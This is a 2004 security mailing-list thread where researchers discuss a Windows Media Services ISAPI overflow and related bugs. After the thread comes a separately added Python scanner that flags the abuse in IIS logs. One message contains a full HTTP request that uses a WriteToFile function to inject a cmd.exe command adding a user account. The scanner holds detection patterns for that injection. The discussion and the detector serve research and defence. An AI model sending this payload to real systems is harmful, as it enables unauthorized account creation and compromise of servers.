Dailydave mailing list archives

Re: New mediaservices sploit


From: "wirepair" <wirepair () roguemail net>
Date: Sat, 13 Mar 2004 11:30:28 -0800

Aha, I submitted that issue already, they're working on it, you may want to look at the setinfo.hts file *cough* 
include....
you can also DoS it a number of ways... I'll be releasing my advisory soon with a bunch of other neat stuff... I was
still unsuccessful in getting an interactive execution immediately, but you can still write to the startup or something 
lame.
-wire

On Sat, 13 Mar 2004 12:57:30 -0600 H D Moore <hdm-daily-dave () digitaloffense net> wrote:
The code was posted to a few sites, it doesn't crash nor exploit any version of nsiislog.dll that I could find. Tested multiple variations on a stock Windows 2000 SP0 system without any real result. I am assuming that since it's in CANVAS, it actually works on /something/, are there any special circumstances required to trigger it? Does the MS03-019 patch have to be installed for it to be vulnerable to this MX_Stats overflow? It almost sounds like it is just another variation of the POST bug... is it also fixed by MS03-022?

Brett actually found three bugs in this ISAPI; the original chunked encoding one, then the POST content overflow, and finally the one which was released by M$ last week. Does anyone have details on the latest vuln?

Bonus points to anyone who can find a better way to exploit the unnamed bug^H^H^Hfeature below, without being dependent on an alternate web service or third-party software. The goal is instant command execution through writing a file to the system with arbitrary (even binary) contents. Writing to autoexec, startup, etc doesn't work since it requires user interaction. Assuming Windows 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work now that signatures are embedded (thanks Brett for info).
GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%
208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0

-HD

On Saturday 13 March 2004 10:55, Dave Aitel wrote:
Securityfocus's vulnerability database isn't really that good for
accuracy. I checked out their update on this media services bug, and
noticed that one of the sploits is for something that was never
publicly released. This is a new bug, not the old bug that Brett Moore
found.

http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c

(It's in CANVAS as well, btw)

-dave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
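As an added example, not code from this thread or from the product's vendor: a small scanner for IIS W3C-style log lines that flags requests to tree.xms whose query carries the WriteToFile pattern HD describes above, so an operator can spot the file-write abuse in existing logs. The log lines (and the benign GetInfo call) are constructed for illustration.

```python
"""Detection example: flag IIS log entries abusing tree.xms WriteToFile."""
import re
from urllib.parse import unquote

# Constructed sample, W3C fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# (the GetInfo call on line 1 is a hypothetical benign request, not a real method name)
SAMPLE_LOG = """\
2004-03-13 19:01:02 10.0.0.5 GET /plugins/framework/script/tree.xms obj=httpd:GetInfo() 200
2004-03-13 19:01:09 10.0.0.5 GET /index.htm - 200
2004-03-13 19:02:11 10.0.0.9 GET /plugins/framework/script/tree.xms obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20%22|../../../../winnt/system32/cmd.exe%22%0A%0D) 200
"""

# Indicators taken from the request quoted in the thread.
WRITE_CALL = re.compile(r"WriteToFile\s*\(", re.IGNORECASE)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
PIPE_TO_EXE = re.compile(r'\|\s*[^"\s]*\.(exe|cmd|bat)\b', re.IGNORECASE)


def classify(line):
    """Return the reasons a log line looks like WriteToFile abuse (empty list if clean)."""
    fields = line.split()
    if len(fields) < 7:
        return []
    _date, _time, _ip, _method, stem, query, _status = fields[:7]
    if not stem.lower().endswith("/tree.xms") or query == "-":
        return []
    decoded = unquote(query)  # undo %0A, %20, %22 ... so the patterns see the real content
    reasons = []
    if WRITE_CALL.search(decoded):
        reasons.append("WriteToFile call in query")
        if TRAVERSAL.search(decoded):
            reasons.append("path traversal in written content")
        if PIPE_TO_EXE.search(decoded):
            reasons.append("pipe-to-executable in written content")
    return reasons


def scan(log_text):
    """Return (line_number, reasons) for every suspicious line in the log text."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```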